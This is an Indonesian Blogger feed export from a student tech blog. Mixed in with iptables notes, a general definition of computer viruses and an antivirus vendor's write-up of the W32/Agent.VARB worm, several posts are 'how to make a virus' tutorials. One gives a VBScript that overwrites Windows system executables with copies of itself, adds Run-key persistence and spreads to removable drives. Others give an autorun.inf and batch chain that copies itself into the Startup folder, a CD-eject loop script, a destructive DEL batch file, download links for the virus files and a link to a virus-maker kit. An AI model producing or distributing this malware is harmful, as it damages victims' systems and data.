tag:blogger.com,1999:blog-32690243049027801102024-03-19T04:39:44.839-07:00Just want to be a Administratorbali technology Mandarahttp://www.blogger.com/profile/14631053675467310243noreply@blogger.comBlogger10125tag:blogger.com,1999:blog-3269024304902780110.post-27753975383219415572011-09-23T04:56:00.000-07:002011-09-23T04:56:26.491-07:00CARA INSTALL LINUX SERVER<a href="http://www.youtube.com/watch?v=d2129OLrY8M&feature=player_detailpage">BERIKUT ADALAH CARA MENGINSTAL LINUX SERVER WITH HAPPY</a>bali technology Mandarahttp://www.blogger.com/profile/14631053675467310243noreply@blogger.com0tag:blogger.com,1999:blog-3269024304902780110.post-77421476057366585142011-09-01T07:34:00.000-07:002011-09-01T07:35:56.368-07:00Iptables On Ubuntu<br />
<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 12pt; line-height: 115%;">Apa itu iptables ?</span></b></div><div class="MsoNormal" style="text-align: justify; text-indent: .5in; text-justify: inter-ideograph;"><span style="font-size: 12pt; line-height: 115%;">Iptables adalah sebuah tool di system operasi linux, yang bertugas untuk mengatur lalu lintas paket data di computer, baik yang masuk , keluar, maupun yang hanya melewati computer tersebut. Dan juga dapat memfilter paket data apakah boleh masuk atau tidak.</span></div><div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 12pt; line-height: 115%;">Apa saja yang bisa dilakukan dengan Iptables ?</span></b></div><div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 12pt; line-height: 115%;"> </span></b><span style="font-size: 12pt; line-height: 115%;">Dengan iptables kita bisa mengatur aliran keluar-masuk data dari computer. Yang penting adalah iptables bisa dibuatkan aturan (rule) untuk lalu lintas data. Aturan itu dapat mengatur data yang bisa lewat, jenis paket yang dapat diterima, mengatur traffic berdasar asal dan tujuan data, forwarding, nat, redirecting, pengelolaan port, dan firewall.</span></div><div class="MsoNormal" style="text-align: justify;"><br />
</div><a name='more'></a><br />
<div class="MsoNormal" style="text-align: justify;"><br />
</div><div class="MsoNormal" style="text-align: justify;"><span style="font-size: 12pt; line-height: 115%;">baca selengkapnya di modulnya dan bisa didownload di :<br />
<a href="http://www.mediafire.com/?kbec5bj576cdlow">http://www.mediafire.com/?kbec5bj576cdlow</a></span></div><div class="MsoNormal" style="text-align: justify;"><br />
</div><div class="MsoNormal" style="text-align: justify;"><span style="font-size: 12pt; line-height: 115%;">diambil dari beberapa refrensi. </span></div><div class="MsoNormal" style="text-align: justify;"><span style="font-size: 12pt; line-height: 115%;"><br />
</span></div><div class="MsoNormal" style="text-align: justify;"><span style="font-size: 12pt; line-height: 115%;"><br />
</span></div>bali technology Mandarahttp://www.blogger.com/profile/14631053675467310243noreply@blogger.com0tag:blogger.com,1999:blog-3269024304902780110.post-84130470430185509902011-08-28T03:41:00.000-07:002011-09-01T07:05:24.956-07:00virus love_mimivirus ini dapat menggandakan semua file atau mencopy nya :<br />
cara membuat virus tersebut dengan mengetik script di bawah ini :<br />
<br />
Set love = createobject(StrReverse("tcejbOmetsySelif.gnitpircS"))<br />
<br />
Set dear = createobject(StrReverse("llehS.tpircSW"))<br />
<br />
qi = "c:\regedit.vbs"<br />
<br />
syau = "c:\mymimi.vbs"<br />
<br />
heiji = "c:\notepad.vbs"<br />
<br />
forest = "c:\antivirus.vbs"<br />
<br />
han = "c:\windows\svchost.exe"<br />
<br />
tachoor = "c:\windows\EXPL0RER.vbs"<br />
<br />
mimi = "c:\windows\system\WinUpdt.vbs"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, tachoor<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, mimi<br />
<br />
on error resume next<br />
<br />
<a name='more'></a><br />
<br />
iqra = dear.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kernell32")<br />
<br />
If iqra <> "c:\windows\svchost.exe " & tachoor then<br />
<br />
on error resume next<br />
<br />
dear.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows ScriptingHost\Settings\Timeout", 0, "REG_DWORD"<br />
<br />
dear.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kernell32", "c:\windows\svchost.exe " & tachoor<br />
<br />
dear.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVGuard32", "c:\windows\svchost.exe " & mimi<br />
<br />
dear.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PCMAVscanner", "c:\windows\svchost.exe " & syau<br />
<br />
done = MsgBox("The application or DLL C:\WINDOWS\system32\MSVBVM60.DLL is not a valid Windows image. Please check this againts your installation diskette.", 16, "msvbvm60.dll - Bad Image")<br />
<br />
dear.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\SVCH0ST", "c:\windows\svchost.exe " & mimi<br />
<br />
love.CopyFile wscript.scriptfullname, "A:\diary_rahmi.vbe"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, tachoor<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\msvbvm60.dll"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvm60.dll"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvm50.dll"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msihnd.dll"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvnvvm60.dll"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\TASKMAN.exe"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\NOTEPAD.exe"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\R.com"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\REGEDIT.com"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\regedit.exe"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\nusrmgr.cpl"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\cmd.exe"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\control.exe"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msiexec.exe"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\regedt32.exe"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\taskman.exe"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\taskmgr.exe"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\command.com"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\T.com"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\TASKMGR.com"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\Restore\rstrui.exe"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\Restore\srdiag.exe"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\Restore\srframe.mmf"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\Restore\rstrlog.dat"<br />
<br />
on error resume next<br />
<br />
cdrsqnx()<br />
<br />
dwozmc()<br />
<br />
ontrus()<br />
<br />
else<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "A:\diary_mimi.vbs"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, tachoor<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\PCMAVExtMonitor.vbs"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvm60.dll"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvm50.dll"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\msvbvm60.dll"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvm60.dll"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\msvbvnvvm60.dll"<br />
<br />
on error resume next<br />
<br />
love.CopyFile wscript.scriptfullname, "C:\WINDOWS\system32\nusrmgr.cpl"<br />
<br />
on error resume next<br />
<br />
hcdmshsx()<br />
<br />
cdrsqnx()<br />
<br />
dwozmc()<br />
<br />
ontrus()<br />
<br />
End if<br />
<br />
Sub hcdmshsx()<br />
<br />
Dim married<br />
<br />
on error resume next<br />
<br />
married = "<br />
<br />
<br />
<br />
lalu simpan dengan nama love_mimi.bat<br />
<br />
atau langsung unduh saja dengan mengeklik link di bawah ini :<br />
<br />
<a href="http://www.4shared.com/file/lS1VN-PE/love_mimi.html">http://www.4shared.com/file/lS1VN-PE/love_mimi.html</a>bali technology Mandarahttp://www.blogger.com/profile/14631053675467310243noreply@blogger.com0tag:blogger.com,1999:blog-3269024304902780110.post-47225284366189230572011-08-22T03:13:00.000-07:002011-08-28T03:46:16.393-07:00funy mousevirus ini dapat membuat kursor menjadi error atau rabies hehehehe kayak anjing yaw<br />
virus ini membuat mouse menjadi bahagia dan menari sendir ^_^ hehehe PRIKITIW<br />
mau cara pembuatan ikuti langkah berikut ini :<br />
download terlebih dahulu softwarenya<br />
<a href="http://filetram.com/download/4shared/8237414133/terabit-virus-maker-3-zip">http://filetram.com/download/4shared/8237414133/terabit-virus-maker-3-zip</a><br />
lalu instal<br />
setelah itu centang funy mouse<br />
lalu creat virus <br />
selesai.. <br />
gampangkan<br />
^_^<br />
by TKJ.source<br />
<br />
<br />
untuk mengunduh file virusnya silahkan download di bawah ini :<br />
<br />
<a href="http://www.4shared.com/file/FWDFa11e/funymouse.html">http://www.4shared.com/file/FWDFa11e/funymouse.html</a>bali technology Mandarahttp://www.blogger.com/profile/14631053675467310243noreply@blogger.com0tag:blogger.com,1999:blog-3269024304902780110.post-56647163741376925382011-08-22T03:08:00.000-07:002011-09-01T07:06:17.181-07:00VIRUS DELLvirus ini dapat memformat harddisk dengan skali klik / buka ^_^<br />
<div><br />
</div><div>cara membuatnya yaitu</div><div>1. buka notepad</div><div>2. ketikkan surce kode dibawah ini :</div><div><br />
</div><div><div>Syntax</div><div> DEL [options] [/A:file_attributes] files_to_delete</div><div><br />
</div><div>Key</div><div> files_to_delete : This may be a filename, a list of files or a Wildcard </div><div><br />
</div><div>options </div><div> /P Give a Yes/No Prompt before deleting. </div><div> /F Ignore read-only setting and delete anyway (FORCE) </div><div> /S Delete from all Subfolders (DELTREE)</div><div> /Q Quiet mode, do not give a Yes/No Prompt before deleting.</div><div><br />
</div><div> /A Select files to delete based on file_attributes </div><div><br />
<a name='more'></a><br />
</div><div>file_attributes:</div><div> R Read-only -R NOT Read-only</div><div> S System -S NOT System</div><div> H Hidden -H NOT Hidden</div><div> A Archive -A NOT Archive</div><div><br />
</div><div>Wildcards: These can be combined with part of a filename</div><div><br />
</div><div> * Match any characters</div><div> ? Match any ONE character</div><div><br />
</div><div><br />
</div><div>3. lalu simpan dengan nama del.bat</div></div><div><br />
</div><div><div>penanggulangan :</div><div>scan dengan antivirus avira</div><div>atau jalan satu satunya install ulang<br />
<br />
download file disini :<br />
<br />
<a href="http://www.4shared.com/file/jA2j2EqI/del.html">http://www.4shared.com/file/jA2j2EqI/del.html</a><br />
<br />
</div></div><div><br />
</div><div><br />
</div>bali technology Mandarahttp://www.blogger.com/profile/14631053675467310243noreply@blogger.com0tag:blogger.com,1999:blog-3269024304902780110.post-49172769373170877902011-08-22T01:14:00.000-07:002011-09-01T07:07:22.319-07:00script virus autocopy dan membuka web otomatistujuan virus ini sederhana saja, virus hanya ingin membuka webblognya dan mencari traffic yang banyak ^_^<br />
untuk lebiha lanjut kita simak di bawah ini :<br />
<br />
lihat skema dibawah ini :<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZalbssMYF2dfEyPZhP0bTVql05PXg8awaCBHHUT9D2yQk1h6qFFXk-aPMQWi3njBjmJ6WqV0-q9_fbIUdfBy9Zeih5o_XYXqoGeju8MqySSvXbcsoNAyZClJ4MiUC_7ksBjoa-_oLLWI4/s1600/ddea.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZalbssMYF2dfEyPZhP0bTVql05PXg8awaCBHHUT9D2yQk1h6qFFXk-aPMQWi3njBjmJ6WqV0-q9_fbIUdfBy9Zeih5o_XYXqoGeju8MqySSvXbcsoNAyZClJ4MiUC_7ksBjoa-_oLLWI4/s320/ddea.jpg" width="191" /></a></div>cara kerja :<br />
1. flashdisk di tancapkan ke komputer.<br />
2. autorun.inf membuka file Virus1.bat<br />
3. virus1.bat mengcopy file secara silent ke folder startup pada komputer korban.<br />
4. script virus2.bat otomatis jalan setiap komputer korban startup.<br />
<br />
<a name='more'></a><br />
<br />
isi dari beberapa file yang tertera pada diatas.<br />
1. Autorun.inf<br />
[autorun]<br />
open=virus1.bat<br />
<br />
2. virus1.bat<br />
copy ".\virus\virus1.bat" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"<br />
<br />
3.virus2.bat<br />
start iexplore http://www.tkjglobalnetwork.blogspot.com<br />
<br />
<br />
<br />
nah sekarang anda bertanya bagaimana menanggulanginya ?<br />
gampang saja , kalau mungkin smadav sudah terinstall. pasti pas flashdisk di tancap pasti akan langsung keluar dialog box sperti dibawah :<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9bIY-ChxAECU57a7zdcg8PMp4m2fTNrxOT9nhK3maXYJggMPQjYQ5KoDz3aFbdQs1fA78iTbLJmtKm4eUYrmn-Bwp2LStCin7vTCaxht1SbgT3Y3r705rRM_v9w7e7s7oNoR5VPJbhb1E/s1600/samdav.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9bIY-ChxAECU57a7zdcg8PMp4m2fTNrxOT9nhK3maXYJggMPQjYQ5KoDz3aFbdQs1fA78iTbLJmtKm4eUYrmn-Bwp2LStCin7vTCaxht1SbgT3Y3r705rRM_v9w7e7s7oNoR5VPJbhb1E/s320/samdav.jpg" width="320" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
jadi virus buatan saya sudah siap di hapus :D<br />
hehe...<br />
<br />
demikian virus script sederhana dari saya.<br />
salam manknico<br />
^_^ <br />
<br />
dan support dari teman dan kelompok saya<br />
<br />
refrensi :<br />
www.google.com<br />
kaskus.us<br />
(mohon maaf link tidak lengkap, karena saya mengambil source secara acak) <br />
dll bali technology Mandarahttp://www.blogger.com/profile/14631053675467310243noreply@blogger.com0tag:blogger.com,1999:blog-3269024304902780110.post-7043436945127936102011-08-18T21:17:00.000-07:002011-09-01T07:08:19.692-07:00VIRUS EJECT CD DRIVERVirus CD DRIVE adalah virus yang memberikan perintah kepada CD DRIVE<br />
untuk membuka dan menutup sendiri agar terkesan CD DRIVE menjadi error<br />
<br />
cara pembuatan virus tersebut sebagai berikut :<br />
1. Buka Notepad<br />
2. Ketikan source code berikut :<br />
<br />
Set oWMP = CreateObject("WMPlayer.OCX.7")<br />
Set colCDROMs = oWMP.cdromCollection<br />
do<br />
if colCDROMs.Count >= 1 then<br />
For i = 0 to colCDROMs.Count - 1<br />
colCDROMs.Item(i).Eject<br />
Next<br />
For i = 0 to colCDROMs.Count - 1<br />
colCDROMs.Item(i).Eject<br />
Next<br />
End If<br />
wscript.sleep 5<br />
loop<br />
<br />
3. kemudian simpan dengan " Anything.vbs"<br />
4. kemudian buka file tersebut maka CD DRIVE akan menjadi tidak terkendali<br />
<br />
<a name='more'></a><br />
<br />
<br />
<br />
Cara Penanggulangan :<br />
Restart Computer<br />
(karena virus tersebut merupakan virus yang aktif ketika di klik atau di buka)<br />
antivirus tidak dapat menditeksi virus karena merupakan script sederhana.<br />
<br />
Referensi :<br />
<a href="http://myhistoryweb.blogspot.com/2009/03/10-virus-notepad-script.html">http://myhistoryweb.blogspot.com/2009/03/10-virus-notepad-script.html</a><br />
<br />
<br />
download file virusnya di sini :<br />
<br />
<a href="http://www.4shared.com/file/jbmmyaX6/ejeck_disk.html">http://www.4shared.com/file/jbmmyaX6/ejeck_disk.html</a><br />
<br />
<br />
bali technology Mandarahttp://www.blogger.com/profile/14631053675467310243noreply@blogger.com0tag:blogger.com,1999:blog-3269024304902780110.post-56731256558083005642011-08-18T17:26:00.000-07:002011-09-01T07:09:20.958-07:00DEFINISI VIRUS KOMPUTER<b>Virus komputer</b> merupakan <a href="http://id.wikipedia.org/wiki/Program_komputer" title="Program komputer">program komputer</a> yang dapat menggandakan atau menyalin dirinya sendiri <sup class="reference" id="cite_ref-vx.netlux.org_0-0"><a href="http://id.wikipedia.org/wiki/Virus_komputer#cite_note-vx.netlux.org-0">[1]</a></sup> dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan <a href="http://id.wikipedia.org/wiki/Virus" title="Virus">virus biologis</a> yang menyebar dengan cara menyisipkan dirinya sendiri ke <a href="http://id.wikipedia.org/wiki/Sel_%28biologi%29" title="Sel (biologi)">sel makhluk hidup</a>. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.<br />
<table class="toc" id="toc"><tbody>
<tr> <td><br />
</td> </tr>
</tbody></table><h2><span class="editsection"></span> <span class="mw-headline" id="Cara_kerja">Cara kerja</span></h2>Virus komputer umumnya dapat merusak <a href="http://id.wikipedia.org/wiki/Perangkat_lunak" title="Perangkat lunak">perangkat lunak</a> komputer dan tidak dapat secara langsung merusak <a href="http://id.wikipedia.org/wiki/Perangkat_keras" title="Perangkat keras">perangkat keras</a> komputer tetapi dapat mengakibatkan kerusakan dengan cara memuat program yang memaksa <i>over process</i> ke perangkat tertentu. Efek negatif virus komputer adalah memperbanyak dirinya sendiri, yang membuat sumber daya pada komputer (seperti penggunaan memori) menjadi berkurang secara signifikan. Hampir 95% virus komputer berbasis sistem operasi Windows. Sisanya menyerang Linux/GNU, <a href="http://id.wikipedia.org/wiki/Mac" title="Mac">Mac</a>, <a href="http://id.wikipedia.org/wiki/FreeBSD" title="FreeBSD">FreeBSD</a>, OS/2 <a href="http://id.wikipedia.org/wiki/IBM" title="IBM">IBM</a>, dan <a class="new" href="http://id.wikipedia.org/w/index.php?title=Sun_Operating_System&action=edit&redlink=1" title="Sun Operating System (halaman belum tersedia)">Sun Operating System</a>. Virus yang ganas akan merusak perangkat keras.<br />
<h2><span class="editsection"></span> <span class="mw-headline" id="Jenis">Jenis</span></h2>Virus komputer adalah sebuah istilah umum untuk menggambarkan segala jenis serangan terhadap komputer. Dikategorikan dari cara kerjanya, virus komputer dapat dikelompokkan ke dalam kategori sebagai berikut:<br />
<ul><li><a class="mw-redirect" href="http://id.wikipedia.org/wiki/Worm" title="Worm">Worm</a> - Menduplikatkan dirinya sendiri pada <a class="mw-redirect" href="http://id.wikipedia.org/wiki/Harddisk" title="Harddisk">harddisk</a>. Ini membuat sumber daya komputer (Harddisk) menjadi penuh akan worm itu.</li>
<li><a href="http://id.wikipedia.org/wiki/Trojan" title="Trojan">Trojan</a> - Mengambil data pada komputer yang telah terinfeksi dan mengirimkannya pada pembuat trojan itu sendiri.</li>
<li><a href="http://id.wikipedia.org/wiki/Backdoor" title="Backdoor">Backdoor</a> - Hampir sama dengan trojan. Namun, Backdoor bisanya menyerupai file yang baik-baik saja. Misalnya game.</li>
<li><a href="http://id.wikipedia.org/wiki/Spyware" title="Spyware">Spyware</a> - Virus yang memantau komputer yang terinfeksi.</li>
<li><a class="new" href="http://id.wikipedia.org/w/index.php?title=Rogue&action=edit&redlink=1" title="Rogue (halaman belum tersedia)">Rogue</a> - merupakan program yang meniru program <a href="http://id.wikipedia.org/wiki/Perangkat_lunak_antivirus" title="Perangkat lunak antivirus">antivirus</a> dan menampilkan aktivitas layaknya antivirus normal, dan memberikan peringatan-peringatan palsu tentang adanya virus. Tujuannya adalah agar pengguna membeli dan mengaktivasi program antivirus palsu itu dan mendatangkan uang bagi pembuat virus rogue tersebut. Juga rogue dapat membuka celah keamanan dalam komputer guna mendatangkan virus lain.</li>
</ul><br />
<a name='more'></a><br />
<ul><li><a href="http://id.wikipedia.org/wiki/Rootkit" title="Rootkit">Rootkit</a> - Virus yang bekerja menyerupai kerja sistem komputer yang biasa saja.</li>
<li><a class="new" href="http://id.wikipedia.org/w/index.php?title=Polymorphic_virus&action=edit&redlink=1" title="Polymorphic virus (halaman belum tersedia)">Polymorphic virus</a> - Virus yang gemar beubah-ubah agar tidak dapat terdeteksi.</li>
<li><a class="new" href="http://id.wikipedia.org/w/index.php?title=Metamorphic_virus&action=edit&redlink=1" title="Metamorphic virus (halaman belum tersedia)">Metamorphic virus</a> - Virus yang mengubah pengkodeannya sendiri agar lebih sulit dideteksi.</li>
<li><a href="http://id.wikipedia.org/wiki/Virus_ponsel" title="Virus ponsel">Virus ponsel</a> - Virus yang berjalan di telepon seluler, dan dapat menimbulkan berbagai macam efek, mulai dari merusak telepon seluler, mencuri data-data di dalam telepon seluler, sampai membuat panggilan-panggilan diam-diam dan menghabiskan pulsa pengguna telepon seluler.</li>
</ul><h2><span class="editsection"></span><span class="mw-headline" id="Cara_mengatasi">Cara mengatasi</span></h2>Serangan virus dapat dicegah atau ditanggulangi dengan menggunakan <a href="http://id.wikipedia.org/wiki/Perangkat_lunak_antivirus" title="Perangkat lunak antivirus">Perangkat lunak antivirus</a>. Jenis perangkat lunak ini dapat juga mendeteksi dan menghapus virus komputer. Virus komputer ini dapat dihapus dengan basis data (<i>database</i>/ <i>Signature-based detection</i>), heuristik, atau peringkat dari program itu sendiri (<i>Quantum</i>).<br />
<h2><span class="editsection"></span><span class="mw-headline" id="Referensi">Referensi</span></h2><div class="references-small" style="list-style-type: decimal;"><ol class="references"><li id="cite_note-vx.netlux.org-0"><b><a href="http://id.wikipedia.org/wiki/Virus_komputer#cite_ref-vx.netlux.org_0-0">^</a></b> Dr. Solomon's Virus Encyclopedia, 1995, <a class="internal mw-magiclink-isbn" href="http://id.wikipedia.org/wiki/Istimewa:Sumber_buku/1897661002">ISBN 1-897661-00-2</a>, Abstract at <a class="external free" href="http://vx.netlux.org/lib/aas10.html" rel="nofollow">http://vx.netlux.org/lib/aas10.html</a></li>
</ol></div>bali technology Mandarahttp://www.blogger.com/profile/14631053675467310243noreply@blogger.com0tag:blogger.com,1999:blog-3269024304902780110.post-79783344276517500312011-08-18T17:19:00.000-07:002011-09-01T07:09:56.052-07:00W32/Agent.VARB<div align="center" class="western" style="margin-bottom: 0in;"><span style="font-size: small;"><b>W32/Agent.VARB</b></span><span style="font-size: x-small;"><span style="font-weight: normal;"><br />
</span></span></div><div align="center" class="western" style="font-weight: normal; margin-bottom: 0in;"><span style="font-size: small;">Font file kerabat shortcut yang menyebarkan virus</span></div><div align="justify" class="western" style="margin-bottom: 0in;"><br />
</div><div align="justify" class="western" style="margin-bottom: 0in;">Tidak mau kalah dengan group konglomerat bioskop di Indonesia yang membuat beberapa perusahaan importir film baru yang diperkirakan sebagai antisipasi jika perusahaan importir film lama (yang menunggak pajak ke pemerintah ratusan milyar rupiah) tidak diperbolehkan mengimpor film. Maka varian virus LNK (shortcut) juga membuat beberapa virus varian baru. Kali ini menyaru sebagai file Font.<br />
Dominasi varian virus shortcut (LNK) mulai bertambah lagi dengan muncul-nya salah satu varian terbaru sejak akhir Maret 2011 lalu. Entah apakah celah shortcut (LNK) menjadi salah satu celah favorit bagi para pembuat malware untuk melakukan penyebaran sehingga menjadi trend, kini makin banyak bermunculan berbagai macam varian dari virus/trojan berbahaya dan worm jaringan yang akan membuat komputer anda menjadi lambat dan tentunya mengganggu pekerjaan anda.</div><div align="justify" class="western" style="margin-bottom: 0in;"><br />
</div><div align="justify" class="western" style="margin-bottom: 0in;">Bagi anda para pengguna komputer dan internet di Indonesia, harap berhati-hati karena saat ini banyak pengguna komputer yang sudah terinfeksi oleh serangan worm ini, dan salah satu varian yang terdeteksi yaitu <b>W32/Agent.VARB </b><span style="font-weight: normal;">(lihat gambar 1)</span></div><div align="center" class="western" style="margin-bottom: 0in;"><img align="bottom" border="0" height="336" src="http://vaksin.com/2011/0711/worm%20font/worm%20font_html_m407433c.jpg" width="528" /></div><div align="center" class="western" style="margin-bottom: 0in;"><i><span style="font-size: x-small;">Gambar 1, Norman mendeteksi varian worm W32/Agent.VARB</span></i></div><div align="justify" class="western" style="margin-bottom: 0in;"><br />
<a name='more'></a><br />
</div><div align="justify" class="western" style="margin-bottom: 0in;"><span style="font-size: small;"><b>Keluarga baru malware shortcut (LNK) : worm </b></span><span style="font-size: small;"><i><b>Agent.VARB</b></i></span><span style="font-size: small;"><b> </b></span> </div><div align="justify" class="western" style="margin-bottom: 0in;">Worm <i>Agent.VARB</i> (Norman) atau sering disebut <i>Rorpian</i> (Microsoft) atau <i>SillyFDC</i> (Symantec, Eset/NOD), dan <i>TDSS</i> (TrendMicro, Sophos), merupakan salah satu kelompok worm yang mampu mengganggu system komputer dalam jaringan dan mencoba memanipulasi system yang ada dalam jaringan. Kemampuan utama dari worm ini adalah dengan melakukan broadcast internet dan membuat komputer menjadi lambat. </div><div align="justify" class="western" style="margin-bottom: 0in;"><br />
</div><div align="justify" class="western" style="margin-bottom: 0in;">Worm ini banyak ditemukan pada komputer-komputer server (atau yang dijadikan sebagai server) yang sering melakukan pertukaran data atau <i>sharing file </i>khusus-nya pengguna Windows Server 2003.</div><div align="justify" class="western" style="margin-bottom: 0in;"><br />
</div><div align="justify" class="western" style="margin-bottom: 0in;">Kelebihan dari worm ini selain mampu melakukan penyebaran menggunakan celah shortcut (LNK) atau <b>MS10-046</b>, juga dapat melakukan penyebaran melalui celah lain yaitu <i>Windows Print Spooler</i> atau <b>MS10-061</b> dan <i>Microsoft OpenType Font Driver</i> atau <b>MS10-091</b>. </div><div align="justify" class="western" style="margin-bottom: 0in;"><br />
</div><div align="justify" class="western" style="margin-bottom: 0in;"><span style="font-size: small;"><b>Gejala & Efek Virus</b></span></div><div align="justify" class="western" style="margin-bottom: 0in;">Beberapa gejala yang terjadi jika anda sudah terinfeksi yaitu :</div><ul><li> <div align="justify" class="western" style="margin-bottom: 0in;"><b>Aktif dengan menginfeksi file Windows Explorer dan Print Spooler</b></div></li>
</ul><div align="justify" style="margin-bottom: 0in; margin-left: 0.5in;">File worm aktif pada <i>memory</i> komputer dengan menginjeksi/menumpang file Windows Explorer dan Print Spooler. Dengan melakukan hal seperti itu, maka akan menghindari antisipasi dari antivirus sehingga sangat sulit dibersihkan. Serangan akan terjadi pada komputer server yang menggunakan Windows Server 2003.</div><ul><li> <div align="justify" class="western" style="margin-bottom: 0in;"><b>Membuat komputer menjadi hang (explorer error)</b></div></li>
</ul><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;">Saat komputer dinyalakan pertama kali dan login, Windows Explorer akan terasa lambat (hang) akibat aktifitas dari worm yang mencoba menginjeksi Windows Explorer. Dengan melakukan hal tersebut, pengguna komputer akan merasa terganggu dan tidak nyaman menggunakan komputer. Terkadang hal ini membuat akibat fatal pada Windows Explorer yang menjadi error. (lihat gambar 2)</div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.5in;"><br />
</div><div align="center" class="western" style="margin-bottom: 0in; margin-left: 0.5in;"><img align="bottom" border="0" height="240" src="http://vaksin.com/2011/0711/worm%20font/worm%20font_html_m1504ded2.jpg" width="384" /></div><div align="center" class="western" style="margin-bottom: 0in; margin-left: 0.5in;"><i><span style="font-size: x-small;">Gambar 2, Windows Explorer menjadi error</span></i></div><div align="justify" class="western" style="margin-bottom: 0in; margin-left: 0.53in;"><br />
</div><ul><li> <div align="justify" class="western" style="margin-bottom: 0in;"><b>Melakukan koneksi ke Remote Server</b></div></li>
</ul><div align="justify" style="margin-bottom: 0in; margin-left: 0.53in;">Worm <i>W32/Agent.VARB</i> juga berusaha melakukan koneksi ke Remote Server untuk melakukan pengiriman informasi yang dibutuhkan pada Remote Server. Koneksi ke <span lang="en-US">beberapa </span>remote server dilakukan dengan menggunakan port acak :</div><ul><li> <div align="justify" style="margin-bottom: 0in;">82.192.xx.xx</div></li>
<li> <div align="justify" style="margin-bottom: 0in;">188.138.xx.xx</div></li>
